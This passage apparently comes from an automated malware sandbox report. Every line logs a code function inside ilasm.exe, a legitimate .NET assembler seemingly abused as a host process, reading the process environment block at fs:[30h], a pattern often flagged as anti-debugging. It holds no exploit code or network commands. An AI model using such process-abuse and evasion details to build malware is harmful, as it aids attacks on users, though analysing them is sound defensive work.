Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C307C3 mov eax, dword ptr fs:[00000030h]	5_2_05C307C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB07AF mov eax, dword ptr fs:[00000030h]	5_2_05BB07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3E7E1 mov eax, dword ptr fs:[00000030h]	5_2_05C3E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB47FB mov eax, dword ptr fs:[00000030h]	5_2_05BB47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB47FB mov eax, dword ptr fs:[00000030h]	5_2_05BB47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD27ED mov eax, dword ptr fs:[00000030h]	5_2_05BD27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD27ED mov eax, dword ptr fs:[00000030h]	5_2_05BD27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD27ED mov eax, dword ptr fs:[00000030h]	5_2_05BD27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBC7C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE273C mov eax, dword ptr fs:[00000030h]	5_2_05BE273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE273C mov ecx, dword ptr fs:[00000030h]	5_2_05BE273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE273C mov eax, dword ptr fs:[00000030h]	5_2_05BE273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34755 mov eax, dword ptr fs:[00000030h]	5_2_05C34755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEC720 mov eax, dword ptr fs:[00000030h]	5_2_05BEC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEC720 mov eax, dword ptr fs:[00000030h]	5_2_05BEC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3E75D mov eax, dword ptr fs:[00000030h]	5_2_05C3E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0710 mov eax, dword ptr fs:[00000030h]	5_2_05BB0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE0710 mov eax, dword ptr fs:[00000030h]	5_2_05BE0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEC700 mov eax, dword ptr fs:[00000030h]	5_2_05BEC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8770 mov eax, dword ptr fs:[00000030h]	5_2_05BB8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770 mov eax, dword ptr fs:[00000030h]	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0750 mov eax, dword ptr fs:[00000030h]	5_2_05BB0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2750 mov eax, dword ptr fs:[00000030h]	5_2_05BF2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2750 mov eax, dword ptr fs:[00000030h]	5_2_05BF2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2C730 mov eax, dword ptr fs:[00000030h]	5_2_05C2C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE674D mov esi, dword ptr fs:[00000030h]	5_2_05BE674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE674D mov eax, dword ptr fs:[00000030h]	5_2_05BE674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE674D mov eax, dword ptr fs:[00000030h]	5_2_05BE674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE66B0 mov eax, dword ptr fs:[00000030h]	5_2_05BE66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEC6A6 mov eax, dword ptr fs:[00000030h]	5_2_05BEC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB4690 mov eax, dword ptr fs:[00000030h]	5_2_05BB4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB4690 mov eax, dword ptr fs:[00000030h]	5_2_05BB4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_05C2E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_05C2E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_05C2E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E6F2 mov eax, dword ptr fs:[00000030h]	5_2_05C2E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C306F1 mov eax, dword ptr fs:[00000030h]	5_2_05C306F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C306F1 mov eax, dword ptr fs:[00000030h]	5_2_05C306F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA6C7 mov ebx, dword ptr fs:[00000030h]	5_2_05BEA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA6C7 mov eax, dword ptr fs:[00000030h]	5_2_05BEA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB262C mov eax, dword ptr fs:[00000030h]	5_2_05BB262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE627 mov eax, dword ptr fs:[00000030h]	5_2_05BCE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE6620 mov eax, dword ptr fs:[00000030h]	5_2_05BE6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE8620 mov eax, dword ptr fs:[00000030h]	5_2_05BE8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2619 mov eax, dword ptr fs:[00000030h]	5_2_05BF2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7866E mov eax, dword ptr fs:[00000030h]	5_2_05C7866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7866E mov eax, dword ptr fs:[00000030h]	5_2_05C7866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC260B mov eax, dword ptr fs:[00000030h]	5_2_05BC260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2674 mov eax, dword ptr fs:[00000030h]	5_2_05BE2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E609 mov eax, dword ptr fs:[00000030h]	5_2_05C2E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA660 mov eax, dword ptr fs:[00000030h]	5_2_05BEA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA660 mov eax, dword ptr fs:[00000030h]	5_2_05BEA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCC640 mov eax, dword ptr fs:[00000030h]	5_2_05BCC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C761C3 mov eax, dword ptr fs:[00000030h]	5_2_05C761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C761C3 mov eax, dword ptr fs:[00000030h]	5_2_05C761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_05C2E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_05C2E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_05C2E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_05C2E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2E1D0 mov eax, dword ptr fs:[00000030h]	5_2_05C2E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAA197 mov eax, dword ptr fs:[00000030h]	5_2_05BAA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAA197 mov eax, dword ptr fs:[00000030h]	5_2_05BAA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAA197 mov eax, dword ptr fs:[00000030h]	5_2_05BAA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C861E5 mov eax, dword ptr fs:[00000030h]	5_2_05C861E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF0185 mov eax, dword ptr fs:[00000030h]	5_2_05BF0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE01F8 mov eax, dword ptr fs:[00000030h]	5_2_05BE01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C6C188 mov eax, dword ptr fs:[00000030h]	5_2_05C6C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C6C188 mov eax, dword ptr fs:[00000030h]	5_2_05C6C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3019F mov eax, dword ptr fs:[00000030h]	5_2_05C3019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3019F mov eax, dword ptr fs:[00000030h]	5_2_05C3019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3019F mov eax, dword ptr fs:[00000030h]	5_2_05C3019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3019F mov eax, dword ptr fs:[00000030h]	5_2_05C3019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C44144 mov eax, dword ptr fs:[00000030h]	5_2_05C44144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C44144 mov eax, dword ptr fs:[00000030h]	5_2_05C44144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C44144 mov ecx, dword ptr fs:[00000030h]	5_2_05C44144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C44144 mov eax, dword ptr fs:[00000030h]	5_2_05C44144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C44144 mov eax, dword ptr fs:[00000030h]	5_2_05C44144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE0124 mov eax, dword ptr fs:[00000030h]	5_2_05BE0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C48158 mov eax, dword ptr fs:[00000030h]	5_2_05C48158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C70115 mov eax, dword ptr fs:[00000030h]	5_2_05C70115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5A118 mov ecx, dword ptr fs:[00000030h]	5_2_05C5A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5A118 mov eax, dword ptr fs:[00000030h]	5_2_05C5A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5A118 mov eax, dword ptr fs:[00000030h]	5_2_05C5A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5A118 mov eax, dword ptr fs:[00000030h]	5_2_05C5A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAC156 mov eax, dword ptr fs:[00000030h]	5_2_05BAC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6154 mov eax, dword ptr fs:[00000030h]	5_2_05BB6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6154 mov eax, dword ptr fs:[00000030h]	5_2_05BB6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C320DE mov eax, dword ptr fs:[00000030h]	5_2_05C320DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C360E0 mov eax, dword ptr fs:[00000030h]	5_2_05C360E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB208A mov eax, dword ptr fs:[00000030h]	5_2_05BB208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAC0F0 mov eax, dword ptr fs:[00000030h]	5_2_05BAC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF20F0 mov ecx, dword ptr fs:[00000030h]	5_2_05BF20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB80E9 mov eax, dword ptr fs:[00000030h]	5_2_05BB80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAA0E3 mov ecx, dword ptr fs:[00000030h]	5_2_05BAA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C480A8 mov eax, dword ptr fs:[00000030h]	5_2_05C480A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C760B8 mov eax, dword ptr fs:[00000030h]	5_2_05C760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C760B8 mov ecx, dword ptr fs:[00000030h]	5_2_05C760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C36050 mov eax, dword ptr fs:[00000030h]	5_2_05C36050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAA020 mov eax, dword ptr fs:[00000030h]	5_2_05BAA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAC020 mov eax, dword ptr fs:[00000030h]	5_2_05BAC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE016 mov eax, dword ptr fs:[00000030h]	5_2_05BCE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE016 mov eax, dword ptr fs:[00000030h]	5_2_05BCE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE016 mov eax, dword ptr fs:[00000030h]	5_2_05BCE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE016 mov eax, dword ptr fs:[00000030h]	5_2_05BCE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34000 mov ecx, dword ptr fs:[00000030h]	5_2_05C34000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDC073 mov eax, dword ptr fs:[00000030h]	5_2_05BDC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2050 mov eax, dword ptr fs:[00000030h]	5_2_05BB2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C46030 mov eax, dword ptr fs:[00000030h]	5_2_05C46030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C363C0 mov eax, dword ptr fs:[00000030h]	5_2_05C363C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C6C3CD mov eax, dword ptr fs:[00000030h]	5_2_05C6C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA8397 mov eax, dword ptr fs:[00000030h]	5_2_05BA8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA8397 mov eax, dword ptr fs:[00000030h]	5_2_05BA8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA8397 mov eax, dword ptr fs:[00000030h]	5_2_05BA8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD438F mov eax, dword ptr fs:[00000030h]	5_2_05BD438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD438F mov eax, dword ptr fs:[00000030h]	5_2_05BD438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAE388 mov eax, dword ptr fs:[00000030h]	5_2_05BAE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAE388 mov eax, dword ptr fs:[00000030h]	5_2_05BAE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAE388 mov eax, dword ptr fs:[00000030h]	5_2_05BAE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE63FF mov eax, dword ptr fs:[00000030h]	5_2_05BE63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE3F0 mov eax, dword ptr fs:[00000030h]	5_2_05BCE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE3F0 mov eax, dword ptr fs:[00000030h]	5_2_05BCE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE3F0 mov eax, dword ptr fs:[00000030h]	5_2_05BCE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_05BC03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_05BBA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_05BB83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_05BB83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_05BB83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_05BB83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C32349 mov eax, dword ptr fs:[00000030h]	5_2_05C32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7A352 mov eax, dword ptr fs:[00000030h]	5_2_05C7A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3035C mov eax, dword ptr fs:[00000030h]	5_2_05C3035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3035C mov eax, dword ptr fs:[00000030h]	5_2_05C3035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3035C mov eax, dword ptr fs:[00000030h]	5_2_05C3035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3035C mov ecx, dword ptr fs:[00000030h]	5_2_05C3035C
